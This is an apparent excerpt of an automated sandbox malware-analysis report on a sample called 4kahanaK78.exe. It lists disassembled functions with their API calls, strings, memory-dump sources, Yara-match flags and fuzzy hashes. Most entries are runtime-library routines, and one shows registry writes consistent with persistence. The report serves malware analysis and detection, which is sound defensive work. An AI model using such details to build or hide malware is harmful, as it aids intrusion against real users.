                                    • _free.LIBCMT ref: 04B5139A
                                    • _free.LIBCMT ref: 04B513A5
                                    • _free.LIBCMT ref: 04B513B0
                                    • _free.LIBCMT ref: 04B513BB
                                    • _free.LIBCMT ref: 04B513C9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
                                    • Instruction ID: 2a10a7805f43cdd66fb67693c0c57ce734796f275dd78e4ecda33884c6c57685
                                    • Opcode Fuzzy Hash: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
                                    • Instruction Fuzzy Hash: A821B87A90011CFFDB05EF99D880EDDBFB8BF08244B4051A6E9259B171DB31EA54DB80
                                    Function 004110E5 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 004110FB
                                      • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                      • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                    • _free.LIBCMT ref: 00411107
                                    • _free.LIBCMT ref: 00411112
                                    • _free.LIBCMT ref: 0041111D
                                    • _free.LIBCMT ref: 00411128
                                    • _free.LIBCMT ref: 00411133
                                    • _free.LIBCMT ref: 0041113E
                                    • _free.LIBCMT ref: 00411149
                                    • _free.LIBCMT ref: 00411154
                                    • _free.LIBCMT ref: 00411162
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 9528e1cdbf83faf96e5ccd5663a9dae100ce71697e6d3b34ec1221184646fa63
                                    • Instruction ID: 5835e015de09c4cc1f53331febaa62aeb6779b48f58b4a69f4cd00ff2e5db2ca
                                    • Opcode Fuzzy Hash: 9528e1cdbf83faf96e5ccd5663a9dae100ce71697e6d3b34ec1221184646fa63
                                    • Instruction Fuzzy Hash: 3D219876900108AFCB41EF95C881DDE7FB9BF48344B0445ABB6199B121EB75DA84CB84
                                    Function 0041A609 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • RtlDecodePointer.NTDLL(?), ref: 0041A622
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: DecodePointer
                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                    • API String ID: 3527080286-3064271455
                                    • Opcode ID: b0f5ff7df8ac5b22e86cd4b492fd97d41adae4fcfb0b2561f3f2f1ad21474b7f
                                    • Instruction ID: 98f7bf46ea2d04c7b06ac9836e821450726948aa73f1de9436264de5739e925b
                                    • Opcode Fuzzy Hash: b0f5ff7df8ac5b22e86cd4b492fd97d41adae4fcfb0b2561f3f2f1ad21474b7f
                                    • Instruction Fuzzy Hash: 5651ACB490121ACBDF109FA8E94C1EEBBB0FB05300F554047D4A1A62A5C77CCAF68B5E
                                    Function 10004131 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • type_info::operator==.LIBVCRUNTIME ref: 10004250
                                    • ___TypeMatch.LIBVCRUNTIME ref: 1000435E
                                    • _UnwindNestedFrames.LIBCMT ref: 100044B0
                                    • CallUnexpected.LIBVCRUNTIME ref: 100044CB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                    • String ID: csm$csm$csm
                                    • API String ID: 2751267872-393685449
                                    • Opcode ID: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                    • Instruction ID: 3d3d7b973083d5502e03e9704e538657a8ad6664bd6ca03923258a49de60437f
                                    • Opcode Fuzzy Hash: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                    • Instruction Fuzzy Hash: C0B180B5C00209DFEF05DF94D881A9EBBB9FF04390F12415AF8116B21ADB31EA51CB99
                                    Function 10008F36 Relevance: 12.2, APIs: 8, Instructions: 203COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free$___from_strstr_to_strchr
                                    • String ID:
                                    • API String ID: 3409252457-0
                                    • Opcode ID: 95010d729c9058774f15a7cf8f5dacf6367eb285395d52ca300c8e26b156bdd9
                                    • Instruction ID: d9dcc3e5fe16bdce254290b2b7dc8605e647b21a7cac7c74f5ab9bfc5a2656b0
                                    • Opcode Fuzzy Hash: 95010d729c9058774f15a7cf8f5dacf6367eb285395d52ca300c8e26b156bdd9
                                    • Instruction Fuzzy Hash: 83510474E04246EFFB10DFB48C85A9E7BE4EF413D0F124169E95497289EB769A00CB51
                                    Function 04B492EF Relevance: 12.1, APIs: 8, Instructions: 51libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0042AF64,00000FA0,?,?,04B492CD), ref: 04B492FB
                                    • GetModuleHandleW.KERNEL32(0041DFB8,?,?,04B492CD), ref: 04B49306
                                    • GetModuleHandleW.KERNEL32(0041DFFC,?,?,04B492CD), ref: 04B49317
                                    • GetProcAddress.KERNEL32(00000000,0041E018), ref: 04B49329
                                    • GetProcAddress.KERNEL32(00000000,0041E034), ref: 04B49337
                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04B492CD), ref: 04B4935A
                                    • RtlDeleteCriticalSection.NTDLL(0042AF64), ref: 04B49376
                                    • CloseHandle.KERNEL32(0042AF60,?,?,04B492CD), ref: 04B49386
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                    • String ID:
                                    • API String ID: 2565136772-0
                                    • Opcode ID: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                    • Instruction ID: 096d5d5beab73883d0c31ded6276062fec5c07aa1a4af502f75caaa1d3304148
                                    • Opcode Fuzzy Hash: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                    • Instruction Fuzzy Hash: 0B01B5F1F40321ABD7202F74AD09B9B3BA8EBCDB11B594071FD05D21A4DBACD4019A6A
                                    Function 100028D6 Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __RTC_Initialize.LIBCMT ref: 1000291D
                                    • ___scrt_uninitialize_crt.LIBCMT ref: 10002937
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: Initialize___scrt_uninitialize_crt
                                    • String ID:
                                    • API String ID: 2442719207-0
                                    • Opcode ID: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                    • Instruction ID: 04769ff959a67eddfc0a91c70c155494b73e6b711ec1a15a155288148215b0b0
                                    • Opcode Fuzzy Hash: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                    • Instruction Fuzzy Hash: 3741F372E05229AFFB21CF68CC41BAF7BA4EB846D0F114119F84467258DB309E419BA1
                                    Function 00405460 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 122registrysleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405493
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 004054B5
                                    • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 004054DD
                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054E6
                                    • Sleep.KERNEL32(000005DC), ref: 00405620
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: CloseCreateOpenSleepValue
                                    • String ID: Q)9$get
                                    • API String ID: 4111408922-3206504531
                                    • Opcode ID: fcdd176a8f4fe517d9bc9ffdb6ab66f0d30b6f13fbb174a808a75cb1d6ca5279
                                    • Instruction ID: 30df8e47a04e2e06ac7afafe3262d146b2e53c9795b1f60deb682199623e9688
                                    • Opcode Fuzzy Hash: fcdd176a8f4fe517d9bc9ffdb6ab66f0d30b6f13fbb174a808a75cb1d6ca5279
                                    • Instruction Fuzzy Hash: 8F418271610108BFEB18CF24CD85BDE7B66EF49304FA0812DF915AA1D5D779EA80CB58
                                    Function 04CE9FE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                    Download Yara Rule
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 04CEA017
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 04CEA01F
                                    • _ValidateLocalCookies.LIBCMT ref: 04CEA0A8
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 04CEA0D3
                                    • _ValidateLocalCookies.LIBCMT ref: 04CEA128
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 1170836740-1018135373
                                    • Opcode ID: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                    • Instruction ID: 320d9273309d4f661b30fab8b9268647b8c7b7509f23bd977647be4226ea204a
                                    • Opcode Fuzzy Hash: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                    • Instruction Fuzzy Hash: 7D41E534A00209EFCF10DF6AC884ABEBBB6AF45328F148055E815AB351D737BA15CB91
                                    Function 10003A20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                    Download Yara Rule
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 10003A57
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 10003A5F
                                    • _ValidateLocalCookies.LIBCMT ref: 10003AE8
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 10003B13
                                    • _ValidateLocalCookies.LIBCMT ref: 10003B68
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 1170836740-1018135373
                                    • Opcode ID: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                    • Instruction ID: 53213870faae5245fec6ed73a44d54790f208d332314260de239e107b7581961
                                    • Opcode Fuzzy Hash: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                    • Instruction Fuzzy Hash: 2A41E434A002189FDF02CF68C881A9FBBF9EF453A8F11C065E9149B356C771EA15CB91
                                    Function 0040ABE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                    Download Yara Rule
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 0040AC17
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0040AC1F
                                    • _ValidateLocalCookies.LIBCMT ref: 0040ACA8
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 0040ACD3
                                    • _ValidateLocalCookies.LIBCMT ref: 0040AD28
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 1170836740-1018135373
                                    • Opcode ID: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                    • Instruction ID: 3b4537d877df667a26a5f7af8fbb8c140355993206fc9854477fa74853602e25
                                    • Opcode Fuzzy Hash: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                    • Instruction Fuzzy Hash: 5E41E634A003089BDF10DF69C844A9FBBB1EF45318F14806AEC156B3D2C7399A65CBDA
                                    Function 0041611C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: C:\Users\user\Desktop\4kahanaK78.exe$obA
                                    • API String ID: 0-381446164
                                    • Opcode ID: 25d76702c84b0b1a2803db8c0b9f12018f39228ab9c5ebd3ea8f3f736e5c4ef2
                                    • Instruction ID: d8f7faa714452712b8dd2e2ad71d7e848a624b740a48fc3c62d8856f0a647b07
                                    • Opcode Fuzzy Hash: 25d76702c84b0b1a2803db8c0b9f12018f39228ab9c5ebd3ea8f3f736e5c4ef2
                                    • Instruction Fuzzy Hash: E321F971600219BFDB20AF668C81DAB776DEF00368712863BFD15D7291D738ED8187A8
                                    Function 100072FC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: api-ms-$ext-ms-
                                    • API String ID: 0-537541572
                                    • Opcode ID: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                    • Instruction ID: 4a8ea71034e84b8525c0961ad639e20c08c2bf99947945f029ec6b94e21b7784
                                    • Opcode Fuzzy Hash: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                    • Instruction Fuzzy Hash: DC219671E01321EBF722DB648C81A4E37A4FB456E0B214124ED59A7195D778EE00A6E1
                                    Function 00411B4A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: api-ms-$ext-ms-
                                    • API String ID: 0-537541572
                                    • Opcode ID: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                    • Instruction ID: 9472c79033c58d28bd5fab4bb402529842eae37fc53cf50cf89856cde478e707
                                    • Opcode Fuzzy Hash: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                    • Instruction Fuzzy Hash: 1F21D571E09221ABCB218B259C44BDB3758AF017A4F254527EE06A73A0F63CFC41C6E8
                                    Function 04CF6482 Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
                                    • Instruction ID: d115a3c1556e8c7a8b1246ba41cab4f2983be82c3d72136885d86cadfd654bff
                                    • Opcode Fuzzy Hash: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
                                    • Instruction Fuzzy Hash: 01119632741704B6F6A0F770CC06FCB7B9E6F00708F408818BB9966152D67DB545A761
                                    Function 1000C5BF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 1000C587: _free.LIBCMT ref: 1000C5AC
                                    • _free.LIBCMT ref: 1000C60D
                                      • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                      • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                    • _free.LIBCMT ref: 1000C618
                                    • _free.LIBCMT ref: 1000C623
                                    • _free.LIBCMT ref: 1000C677
                                    • _free.LIBCMT ref: 1000C682
                                    • _free.LIBCMT ref: 1000C68D
                                    • _free.LIBCMT ref: 1000C698
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: c4c0a627cdf80609df9843e8342f0dd46d11e13b3267d69b732be6628a16741d
                                    • Instruction ID: 1780f257e170a803287b818d598211b5e25d48ac92953e35ea001cf34306b7c8
                                    • Opcode Fuzzy Hash: c4c0a627cdf80609df9843e8342f0dd46d11e13b3267d69b732be6628a16741d
                                    • Instruction Fuzzy Hash: 25115479940B08AAF520EB70CC47FCF7B9CEF457C1F400819B29D76097DA75B6484AA1
                                    Function 04B572E9 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 04B572B1: _free.LIBCMT ref: 04B572D6
                                    • _free.LIBCMT ref: 04B57337
                                      • Part of subcall function 04B51D29: HeapFree.KERNEL32(00000000,00000000,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?), ref: 04B51D3F
                                      • Part of subcall function 04B51D29: GetLastError.KERNEL32(?,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?,?), ref: 04B51D51
                                    • _free.LIBCMT ref: 04B57342
                                    • _free.LIBCMT ref: 04B5734D
                                    • _free.LIBCMT ref: 04B573A1
                                    • _free.LIBCMT ref: 04B573AC
                                    • _free.LIBCMT ref: 04B573B7
                                    • _free.LIBCMT ref: 04B573C2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
                                    • Instruction ID: f3638e34a91a9eb389efc8ebeddf53615fc296e693e6a5b1e9022694aa798f79
                                    • Opcode Fuzzy Hash: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
                                    • Instruction Fuzzy Hash: C1117F31A50B08BAE920B7B1DC05FCBF79CEF05704F800858FBAD760B0DA66B5145660
                                    Function 00417082 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041704A: _free.LIBCMT ref: 0041706F
                                    • _free.LIBCMT ref: 004170D0
                                      • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                      • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                    • _free.LIBCMT ref: 004170DB
                                    • _free.LIBCMT ref: 004170E6
                                    • _free.LIBCMT ref: 0041713A
                                    • _free.LIBCMT ref: 00417145
                                    • _free.LIBCMT ref: 00417150
                                    • _free.LIBCMT ref: 0041715B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 7beb403989f2ff45ac883155ca3436412fe8c3dddbb890deb39d287985adf827
                                    • Instruction ID: 17f1ba636a3ac0ac971b1a3f484e478362915a153c89e36741bf365215ef3bb6
                                    • Opcode Fuzzy Hash: 7beb403989f2ff45ac883155ca3436412fe8c3dddbb890deb39d287985adf827
                                    • Instruction Fuzzy Hash: 9C118EB2585744B6D520B772CC06FCB7BEC6F48304F40481FB69E66063EA2CAAC04645
                                    Function 04B57F3A Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetConsoleCP.KERNEL32(00000000,00000000,00000000), ref: 04B57F82
                                    • __fassign.LIBCMT ref: 04B58161
                                    • __fassign.LIBCMT ref: 04B5817E
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04B581C6
                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04B58206
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 04B582B2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileWrite__fassign$ConsoleErrorLast
                                    • String ID:
                                    • API String ID: 4031098158-0
                                    • Opcode ID: 7b0876cbb8b9c7573fbc639d1b90b5e6ef59ffe5efa56104f918bce5801debe4
                                    • Instruction ID: 8606dff038d5312d631dc210a50766c7e4134fa67084ac058c82fc762aa38f79
                                    • Opcode Fuzzy Hash: 7b0876cbb8b9c7573fbc639d1b90b5e6ef59ffe5efa56104f918bce5801debe4
                                    • Instruction Fuzzy Hash: ACD1C970E016489FDF11DFE8D880AEDFBB5FF48304F2840AAE815BB261D631A952CB50
                                    Function 00417CD3 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetConsoleCP.KERNEL32(00000020,00000000,00000000), ref: 00417D1B
                                    • __fassign.LIBCMT ref: 00417EFA
                                    • __fassign.LIBCMT ref: 00417F17
                                    • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00417F5F
                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00417F9F
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041804B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: FileWrite__fassign$ConsoleErrorLast
                                    • String ID:
                                    • API String ID: 4031098158-0
                                    • Opcode ID: 7d169ff53d2c182e8e6c437c86224f09291a86b025f17f4b0d862f02f7e42911
                                    • Instruction ID: bf6bde338aaa4c5312f696cbfa7b8c1c2da82e764b9ff6896d8d464e3c4a4b13
                                    • Opcode Fuzzy Hash: 7d169ff53d2c182e8e6c437c86224f09291a86b025f17f4b0d862f02f7e42911
                                    • Instruction Fuzzy Hash: 13D19C71E042589FCF15CFA8C9809EEBBB5FF49314F29006AE815BB341D735A986CB58
                                    Function 1000B6D8 Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
